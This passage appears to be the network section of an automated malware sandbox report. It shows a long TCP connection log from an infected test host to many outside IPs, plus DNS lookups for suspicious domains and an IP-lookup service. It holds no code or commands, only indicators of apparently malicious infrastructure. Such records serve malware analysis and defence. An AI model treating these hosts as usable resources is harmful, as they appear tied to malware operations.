                                                                                Feb 23, 2024 14:28:23.772507906 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.772528887 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.772567987 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.772649050 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.772711039 CET808051057209.97.150.167192.168.2.8
                                                                                Feb 23, 2024 14:28:23.772857904 CET5066818939192.168.2.872.10.160.90
                                                                                Feb 23, 2024 14:28:23.772860050 CET5066710867192.168.2.867.43.227.226
                                                                                Feb 23, 2024 14:28:23.772880077 CET5019632425192.168.2.867.43.227.227
                                                                                Feb 23, 2024 14:28:23.772880077 CET502788080192.168.2.863.151.67.7
                                                                                Feb 23, 2024 14:28:23.772881031 CET5028041541192.168.2.8222.165.223.139
                                                                                Feb 23, 2024 14:28:23.772882938 CET505913128192.168.2.813.37.59.99
                                                                                Feb 23, 2024 14:28:23.772883892 CET500932006192.168.2.8173.44.141.179
                                                                                Feb 23, 2024 14:28:23.772887945 CET5009880192.168.2.850.168.163.176
                                                                                Feb 23, 2024 14:28:23.772900105 CET5028762727192.168.2.851.75.125.208
                                                                                Feb 23, 2024 14:28:23.772902966 CET502854153192.168.2.8190.2.115.33
                                                                                Feb 23, 2024 14:28:23.772902966 CET506889300192.168.2.8198.211.99.26
                                                                                Feb 23, 2024 14:28:23.772919893 CET5030252611192.168.2.837.44.238.2
                                                                                Feb 23, 2024 14:28:23.772919893 CET4974480192.168.2.896.113.158.126
                                                                                Feb 23, 2024 14:28:23.772922039 CET503005678192.168.2.8177.222.60.138
                                                                                Feb 23, 2024 14:28:23.772922993 CET5005111201192.168.2.838.41.0.6
                                                                                Feb 23, 2024 14:28:23.772922993 CET498008089192.168.2.8125.87.86.119
                                                                                Feb 23, 2024 14:28:23.772922993 CET502992002192.168.2.8103.144.18.137
                                                                                Feb 23, 2024 14:28:23.772927999 CET499378080192.168.2.8200.108.234.105
                                                                                Feb 23, 2024 14:28:23.772933006 CET502924145192.168.2.8122.53.82.126
                                                                                Feb 23, 2024 14:28:23.772933006 CET5029342456192.168.2.8171.244.140.160
                                                                                Feb 23, 2024 14:28:23.772950888 CET5029612250192.168.2.892.246.139.113
                                                                                Feb 23, 2024 14:28:23.772952080 CET50297999192.168.2.845.4.202.73
                                                                                Feb 23, 2024 14:28:23.772952080 CET510578080192.168.2.8209.97.150.167
                                                                                Feb 23, 2024 14:28:23.772979975 CET5028942571192.168.2.892.204.134.38
                                                                                Feb 23, 2024 14:28:23.772983074 CET502833128192.168.2.8154.201.63.79
                                                                                Feb 23, 2024 14:28:23.772994995 CET5030380192.168.2.8103.125.160.178
                                                                                Feb 23, 2024 14:28:23.772999048 CET5030130016192.168.2.885.187.151.27
                                                                                Feb 23, 2024 14:28:23.773124933 CET510578080192.168.2.8209.97.150.167
                                                                                Feb 23, 2024 14:28:23.773504972 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.773550987 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.773605108 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.773634911 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.774000883 CET308835059567.43.227.228192.168.2.8
                                                                                Feb 23, 2024 14:28:23.774238110 CET206955007967.43.236.20192.168.2.8
                                                                                Feb 23, 2024 14:28:23.774315119 CET805104950.231.172.74192.168.2.8
                                                                                Feb 23, 2024 14:28:23.776854992 CET510844153192.168.2.893.90.212.2
                                                                                Feb 23, 2024 14:28:23.778449059 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.778465033 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.778472900 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.778529882 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.778529882 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.778543949 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.778661966 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.778712988 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.779393911 CET805093294.20.183.172192.168.2.8
                                                                                Feb 23, 2024 14:28:23.779520035 CET5093280192.168.2.894.20.183.172
                                                                                Feb 23, 2024 14:28:23.779671907 CET543955025151.79.87.144192.168.2.8
                                                                                Feb 23, 2024 14:28:23.779802084 CET5093280192.168.2.894.20.183.172
                                                                                Feb 23, 2024 14:28:23.779845953 CET5025154395192.168.2.851.79.87.144
                                                                                Feb 23, 2024 14:28:23.780039072 CET5108519404192.168.2.8192.111.139.163
                                                                                Feb 23, 2024 14:28:23.780096054 CET5025154395192.168.2.851.79.87.144
                                                                                Feb 23, 2024 14:28:23.781158924 CET900050725122.116.150.2192.168.2.8
                                                                                Feb 23, 2024 14:28:23.781233072 CET900050725122.116.150.2192.168.2.8
                                                                                Feb 23, 2024 14:28:23.782248020 CET510879000192.168.2.8122.116.150.2
                                                                                Feb 23, 2024 14:28:23.783010960 CET559195011545.79.191.205192.168.2.8
                                                                                Feb 23, 2024 14:28:23.785305023 CET805089960.246.122.244192.168.2.8
                                                                                Feb 23, 2024 14:28:23.785386086 CET8050924104.22.14.48192.168.2.8
                                                                                Feb 23, 2024 14:28:23.785427094 CET5089980192.168.2.860.246.122.244
                                                                                Feb 23, 2024 14:28:23.785651922 CET5089980192.168.2.860.246.122.244
                                                                                Feb 23, 2024 14:28:23.786976099 CET3953350481167.172.109.12192.168.2.8
                                                                                Feb 23, 2024 14:28:23.787292004 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.787522078 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.787534952 CET31285039679.101.37.78192.168.2.8
                                                                                Feb 23, 2024 14:28:23.788016081 CET8050997172.67.181.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.788077116 CET8050997172.67.181.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.788368940 CET5099780192.168.2.8172.67.181.37
                                                                                Feb 23, 2024 14:28:23.788374901 CET8050997172.67.181.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.788495064 CET502908080192.168.2.8178.115.230.243
                                                                                Feb 23, 2024 14:28:23.788506031 CET5069110121192.168.2.867.43.236.20
                                                                                Feb 23, 2024 14:28:23.788510084 CET5068680192.168.2.850.174.145.11
                                                                                Feb 23, 2024 14:28:23.788525105 CET5022313897192.168.2.867.43.227.227
                                                                                Feb 23, 2024 14:28:23.788523912 CET5070417719192.168.2.867.43.227.228
                                                                                Feb 23, 2024 14:28:23.788548946 CET5099780192.168.2.8172.67.181.37
                                                                                Feb 23, 2024 14:28:23.788554907 CET5047445685192.168.2.836.66.173.145
                                                                                Feb 23, 2024 14:28:23.788559914 CET5028880192.168.2.849.7.11.187
                                                                                Feb 23, 2024 14:28:23.788559914 CET5029852359192.168.2.8188.164.196.31
                                                                                Feb 23, 2024 14:28:23.788562059 CET506084145192.168.2.8142.54.226.214
                                                                                Feb 23, 2024 14:28:23.788626909 CET5030417158192.168.2.892.205.110.47
                                                                                Feb 23, 2024 14:28:23.788626909 CET5065245203192.168.2.8192.169.213.167
                                                                                Feb 23, 2024 14:28:23.789051056 CET14755106872.10.160.173192.168.2.8
                                                                                Feb 23, 2024 14:28:23.789767027 CET32835060072.10.160.173192.168.2.8
                                                                                Feb 23, 2024 14:28:23.790980101 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.790988922 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.791382074 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.793004036 CET805051250.222.245.47192.168.2.8
                                                                                Feb 23, 2024 14:28:23.793471098 CET10885043446.227.37.1192.168.2.8
                                                                                Feb 23, 2024 14:28:23.794640064 CET5116749945207.180.236.140192.168.2.8
                                                                                Feb 23, 2024 14:28:23.797218084 CET5108911946192.168.2.891.134.140.160
                                                                                Feb 23, 2024 14:28:23.797408104 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.797446966 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.797635078 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.797637939 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.797744989 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.797790051 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.797833920 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.797836065 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.797940016 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.797991991 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.798110008 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.798136950 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.798206091 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.798424959 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.798667908 CET4891550321138.201.21.232192.168.2.8
                                                                                Feb 23, 2024 14:28:23.798826933 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.798875093 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.798913002 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.798973083 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.799002886 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.799026966 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.799057007 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.799062014 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.799297094 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.799928904 CET805059250.174.145.9192.168.2.8
                                                                                Feb 23, 2024 14:28:23.800561905 CET510903128192.168.2.8111.68.31.130
                                                                                Feb 23, 2024 14:28:23.800607920 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.800632000 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.800657988 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.800723076 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.800730944 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.800745010 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.800751925 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.800815105 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.801363945 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.801388025 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.801418066 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.801460028 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.801489115 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.801516056 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.801525116 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.801537991 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.801573992 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.801573992 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.801589966 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.801978111 CET805061385.12.214.148192.168.2.8
                                                                                Feb 23, 2024 14:28:23.802149057 CET805061385.12.214.148192.168.2.8
                                                                                Feb 23, 2024 14:28:23.802270889 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.802392960 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.802433014 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.802494049 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.802643061 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.802691936 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.802773952 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.803016901 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.803025007 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.803177118 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.804007053 CET805095485.12.214.148192.168.2.8
                                                                                Feb 23, 2024 14:28:23.804104090 CET510913128192.168.2.8139.99.148.90
                                                                                Feb 23, 2024 14:28:23.804104090 CET5031355850192.168.2.8193.31.119.180
                                                                                Feb 23, 2024 14:28:23.804106951 CET5023732175192.168.2.867.43.236.19
                                                                                Feb 23, 2024 14:28:23.804151058 CET50314999192.168.2.8181.204.27.74
                                                                                Feb 23, 2024 14:28:23.804155111 CET5071180192.168.2.850.169.23.170
                                                                                Feb 23, 2024 14:28:23.804227114 CET5095480192.168.2.885.12.214.148
                                                                                Feb 23, 2024 14:28:23.804327011 CET808050981195.225.142.169192.168.2.8
                                                                                Feb 23, 2024 14:28:23.804480076 CET5095480192.168.2.885.12.214.148
                                                                                Feb 23, 2024 14:28:23.804527044 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.804543972 CET509818080192.168.2.8195.225.142.169
                                                                                Feb 23, 2024 14:28:23.804548979 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.804604053 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.804611921 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.804691076 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.804692030 CET509818080192.168.2.8195.225.142.169
                                                                                Feb 23, 2024 14:28:23.804804087 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.804847002 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.804979086 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.805001974 CET976451013162.243.102.207192.168.2.8
                                                                                Feb 23, 2024 14:28:23.805084944 CET808150868193.239.58.92192.168.2.8
                                                                                Feb 23, 2024 14:28:23.805198908 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.805238962 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.805244923 CET808150868193.239.58.92192.168.2.8
                                                                                Feb 23, 2024 14:28:23.805398941 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.805413961 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.805484056 CET102935051175.119.145.169192.168.2.8
                                                                                Feb 23, 2024 14:28:23.805514097 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.805561066 CET976451013162.243.102.207192.168.2.8
                                                                                Feb 23, 2024 14:28:23.805845976 CET53855061172.10.160.170192.168.2.8
                                                                                Feb 23, 2024 14:28:23.805932045 CET72495061272.10.160.90192.168.2.8
                                                                                Feb 23, 2024 14:28:23.806380987 CET510938081192.168.2.8193.239.58.92
                                                                                Feb 23, 2024 14:28:23.806380987 CET510929764192.168.2.8162.243.102.207
                                                                                Feb 23, 2024 14:28:23.809650898 CET41455090298.188.47.132192.168.2.8
                                                                                Feb 23, 2024 14:28:23.809705973 CET41455090298.188.47.132192.168.2.8
                                                                                Feb 23, 2024 14:28:23.811044931 CET808050875185.38.111.1192.168.2.8
                                                                                Feb 23, 2024 14:28:23.811079025 CET808050875185.38.111.1192.168.2.8
                                                                                Feb 23, 2024 14:28:23.811410904 CET510944145192.168.2.898.188.47.132
                                                                                Feb 23, 2024 14:28:23.811707020 CET508758080192.168.2.8185.38.111.1
                                                                                Feb 23, 2024 14:28:23.811800957 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.811836958 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.811877012 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.811933041 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.811966896 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.811990976 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.812025070 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.812046051 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.812325001 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.812390089 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.812427998 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.812447071 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.812467098 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.812500000 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.812545061 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.812558889 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.812583923 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.812606096 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.812690973 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.812700033 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.812710047 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.812762976 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.812794924 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.812796116 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.812848091 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.812856913 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.812875986 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.812886000 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.812906027 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.812936068 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.812959909 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.812995911 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.813066959 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.813087940 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.813113928 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.813146114 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.813169003 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.813179970 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.813209057 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.813251019 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.813267946 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.813304901 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.813313961 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.813338995 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.813381910 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.813388109 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.813396931 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.813456059 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.813529968 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.813643932 CET5109553728192.168.2.8145.239.2.102
                                                                                Feb 23, 2024 14:28:23.813719988 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.813740969 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.813749075 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.813756943 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.813815117 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.813822985 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.813836098 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.813847065 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.813864946 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.813936949 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.813949108 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.813986063 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.814057112 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.814085007 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.814133883 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.814141035 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.814147949 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.814188004 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.814207077 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.814232111 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.814249992 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.814270020 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.814297915 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.814306974 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.814346075 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.814347029 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.814356089 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.814379930 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.814418077 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.814425945 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.814445972 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.814579010 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.814591885 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.814604044 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.814611912 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.814668894 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.814677954 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.814712048 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.814724922 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.814733982 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.814743042 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.814755917 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.814766884 CET5072280192.168.2.850.217.226.41
                                                                                Feb 23, 2024 14:28:23.814779997 CET5000580192.168.2.850.239.72.18
                                                                                Feb 23, 2024 14:28:23.814814091 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.814816952 CET5059880192.168.2.850.200.12.80
                                                                                Feb 23, 2024 14:28:23.815129995 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.815180063 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.815238953 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.815253973 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.815259933 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.815332890 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.815351009 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.815429926 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.815500975 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.815502882 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.815555096 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.815568924 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.815588951 CET510965678192.168.2.842.112.209.68
                                                                                Feb 23, 2024 14:28:23.815637112 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.815725088 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.815790892 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.815798044 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.815813065 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.815825939 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.815833092 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.815848112 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.815849066 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.815855980 CET8051023104.19.233.117192.168.2.8
                                                                                Feb 23, 2024 14:28:23.815885067 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.815893888 CET8051023104.19.233.117192.168.2.8
                                                                                Feb 23, 2024 14:28:23.815938950 CET91805103594.23.252.168192.168.2.8
                                                                                Feb 23, 2024 14:28:23.815989017 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.816025019 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.816036940 CET510359180192.168.2.894.23.252.168
                                                                                Feb 23, 2024 14:28:23.816080093 CET4228500485.161.219.13192.168.2.8

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Feb 23, 2024 14:28:20.564595938 CET192.168.2.81.1.1.10x9809Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                Feb 23, 2024 14:28:25.334287882 CET192.168.2.81.1.1.10xfbd8Standard query (0)heygirlisheeverythingyouwantedinaman.comA (IP address)IN (0x0001)false
                                                                                Feb 23, 2024 14:28:28.750432014 CET192.168.2.81.1.1.10xbe0cStandard query (0)repository.gij.edu.ghA (IP address)IN (0x0001)false
                                                                                Feb 23, 2024 14:28:39.544001102 CET192.168.2.81.1.1.10x2d91Standard query (0)ktxcomay.com.vnA (IP address)IN (0x0001)false
                                                                                Feb 23, 2024 14:28:47.697627068 CET192.168.2.81.1.1.10x7217Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                Feb 23, 2024 14:28:48.872318983 CET192.168.2.81.1.1.10x7d7aStandard query (0)mail.supplyvan.xyzA (IP address)IN (0x0001)false

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Feb 23, 2024 14:28:20.652656078 CET1.1.1.1192.168.2.80x9809No error (0)github.com140.82.113.4A (IP address)IN (0x0001)false
                                                                                Feb 23, 2024 14:28:23.536412001 CET1.1.1.1192.168.2.80x19afNo error (0)windowsupdatebg.s.llnwi.net69.164.46.0A (IP address)IN (0x0001)false
                                                                                Feb 23, 2024 14:28:23.536412001 CET1.1.1.1192.168.2.80x19afNo error (0)windowsupdatebg.s.llnwi.net69.164.46.128A (IP address)IN (0x0001)false
